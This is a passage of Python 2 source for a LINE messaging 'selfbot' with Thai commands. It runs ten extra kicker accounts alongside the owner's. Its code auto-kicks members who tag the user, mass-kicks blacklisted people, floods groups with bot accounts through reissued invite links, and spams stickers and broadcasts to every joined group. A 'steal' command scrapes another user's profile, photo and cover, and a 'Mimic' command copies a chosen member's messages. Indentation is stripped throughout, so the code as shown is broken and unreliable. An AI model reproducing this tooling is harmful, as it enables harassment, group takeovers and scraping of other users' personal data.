Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if op.type == 13:
if mid in op.param3:
if wait["pautoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to, "error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + ""]
ret_ = "[Auto] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = ''
msg.contentMetadata = {
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'697'
}
cl.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Done already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done done aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["คำสั่ง"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["คำสั่ง2"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage2 + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["คำสั่ง3"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage3 + "")
else:
cl.sendText(msg.to,helpt)
cl.sendText(msg.to,helpt)
elif ("Gn:" in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:"," ")
klist=[ki7,ki6,ki5,ki1,cl]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[midd])
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ == admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki1.findAndAddContactsByMid(invite)
ki1.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if msg.contentType == 13:
if wait['ainvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki1.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki1.findAndAddContactsByMid(target)
ki1.inviteIntoGroup(msg.to,[target])
ki1.sendText(msg.to,"Invite " + _name)
wait['ainvite'] = False
break
except:
ki1.sendText(msg.to,"Error")
wait['ainvite'] = False
break
if msg.contentType == 13:
if wait['binvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki2.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki2.findAndAddContactsByMid(target)
ki2.inviteIntoGroup(msg.to,[target])
ki2.sendText(msg.to,"Invite " + _name)
wait['binvite'] = False
break
except:
ki2.sendText(msg.to,"Error")
wait['binvite'] = False
break
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif msg.text.lower() == 'บอท':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
cl.sendMessage(msg)
elif msg.text.lower() == '#บอท':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
ki1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
ki6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
ki7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
ki8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
ki9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
ki10.sendMessage(msg)
elif "คท" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'ยูทูป ' in msg.text:
try:
textToSearch = (msg.text).replace('ยูทูป ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif msg.text in ["55","555"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
elif "youname " in msg.text.lower():
txt = msg.text.replace("youname ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Banned")
print "[Command] Bannad"
except:
pass
#===========================================
#----------------------------------------------------------------------------
#------------------------------- UNBAN BY TAG -------------------------------
elif "Wl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Unbanned")
print "[Command] Unbannad"
except:
pass
# elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
# text = msg.text
# if text is not None:
# cl.sendText(msg.to,text)
# else:
# if msg.contentType == 7:
# msg.contentType = 7
# msg.text = None
# msg.contentMetadata = {
# "STKID": "6",
# "STKPKGID": "1",
# "STKVER": "100" }
# cl.sendMessage(msg)
# elif msg.contentType == 13:
# msg.contentType = 13
# msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
# cl.sendMessage(msg)
elif "Mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on\n\nเปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already on\n\nเปิดการเลียนเเบบ")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off\n\nปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already off\n\nปิดการเลียนเเบบ")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดผิดพลาด")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"โปรเเกรมเลียนเเบบทำงาน")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดข้อผิดพลาด")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"คุณลบการเลียนเเบบผู้ใช้นี้")
break
elif cmd == "list":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<List Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n-> " + cl.getContact(a).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal: " + total)
#----------------------------------------------------------------------------
elif msg.text.lower() in ["botkill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
ki1.kickoutFromGroup(msg.to,[jj])
pass
elif msg.text.lower() in ["admins","mee","ผู้สร้าง"]:
msg.contentType = 13
adm = 'u65224f4e8812136f01b25275a54b5aef'
msg.contentMetadata = {'mid': adm}
cl.sendMessage(msg)
cl.sendText(msg.to,"Add Line http://line.me/ti/p/arif.mh")
cl.sendText(msg.to,"👆 สนใจ บอท ทักมาคุย กันได้นะครับ 👆")
#=========================================
elif msg.text in ["ของขวัญ","Gift","แจก"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["คิก1 แจก","Gift 1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki1.sendMessage(msg)
elif msg.text in ["คิก2 แจก","Gift 2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["คิก3 แจก","Gift 3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot3 Gift","3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["คิก4 แจก","Gift 4"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["คิก5 แจก","Gift 5"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["คิก6 แจก","Gift 6"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["คิก7 แจก","Gift 7"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["คิก8 แจก"," Gift 8"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["คิก9 แจก","Gift 9"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["คิก10 แจก","Gift 10"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki10.sendMessage(msg)
#====================================================
#VPS STUFF - VPS NEEDED TO RUN THIS COMMAND :)
elif msg.text in ["vps","kernel","Vps"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "ผู้สร้างกลุ่ม" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif 'ขอเพลง ' in msg.text:
try:
textToSearch = (msg.text).replace('ขอเพลง ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif "#set" in msg.text:
cl.sendText(msg.to, "Let's see who lazy to type")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif "#read" in msg.text:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "people who reading%s\n is this\n\n\nDate and time I started it:\n[%s]" % (wait2['readMember'][msg.to],setTime[msg.to]))
else:
cl.sendText(msg.to, "read point not set\nReading point setting you send it it will send an esxisting one")
elif msg.text in ["Myginfoid","ไอดีกลุ่ม ทั้งหมด"]:
gid = cl.getGroupIdsJoined()
g = ""
for i in gid:
g += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,g)
elif msg.text in ["P1 invite","P1 Invite"]:
wait["ainvite"] = True
ki1.sendText(msg.to,"Send Contact")
elif msg.text in ["P2 invite","P2 Invite"]:
wait["binvite"] = True
ki2.sendText(msg.to,"Send Contact")
#==================================================
elif "ประกาศ:" in msg.text:
bctxt = msg.text.replace("ประกาศ:", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif msg.text.lower() == 'bann':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "#หำ1:" in msg.text:
string = msg.text.replace("#หำ1:","")
if len(string.decode('utf-8')) <= 20:
profile = ki1.getProfile()
profile.displayName = string
ki1.updateProfile(profile)
elif msg.text in ["คิกมา","มาหำ","#Kicker","#kicker","Kicker","kicker","•••"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.sendText(msg.to,"[SELF BOT\ทBy:☬ARIFISTIFIK☬ ]")
ki2.sendText(msg.to,"[Do not think will try.]")
ki3.sendText(msg.to,"[ By: ☬ARIFISTIFIK☬ ]")
ki1.sendText(msg.to,"Hello " + str(ginfo.name) + "\n[By:☬ARIFISTIFIK☬ ]")
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิก"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิกออก","บอทออก","Bye","#bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki1.leaveGroup(msg.to)
ki2.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki2.leaveGroup(msg.to)
ki3.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki3.leaveGroup(msg.to)
ki4.sendText(msg.to,"Bye~Bye\nลาก่อย" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki4.leaveGroup(msg.to)
ki5.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki5.leaveGroup(msg.to)
ki6.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]]")
ki6.leaveGroup(msg.to)
ki7.sendText(msg.to,"Bye~Bye\nลาก่อย ??" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki7.leaveGroup(msg.to)
ki8.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki8.leaveGroup(msg.to)
ki9.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki9.leaveGroup(msg.to)
ki10.sendText(msg.to,"Bye~Bye\ลาก่อย " + str(ginfo.name) + "\n[By ☬ARIFISTIFIK☬]")
ki10.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == '#byeall':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
elif "#v10" in msg.text:
cl.sendText(msg.to,"""[SELF BOT]\n[By:☬ARIFISTIFIK☬]")
คำสั่งบอท siri
คำนี้เป็นการล็อกห้องสั่งแล้วทุกคนจะทำอะไรไม่ได้นอกจากเจ้าของห้องทำได้คนเดียวเช่น•เปิดลิงค์•เชิญเพื่อน•เปลี่ยนรูปกลุ่ม•เปลี่ยนชื่อกลุ่มไรแบบนี้• บอทจะไม่เตะเเอทมินทุกกรณี
มีตั้งเเต่ชุดบอท 12-37 บอท
ชุดล๊อกห้อง
ล๊อกกันรันสติ๊กเกอร์
Set:StampLimitation:on
ล๊อกชื่อกลุ่ม
Set:changenamelock:on
ล๊อกการเชิญของสมาชิก
Set:blockinvite:on
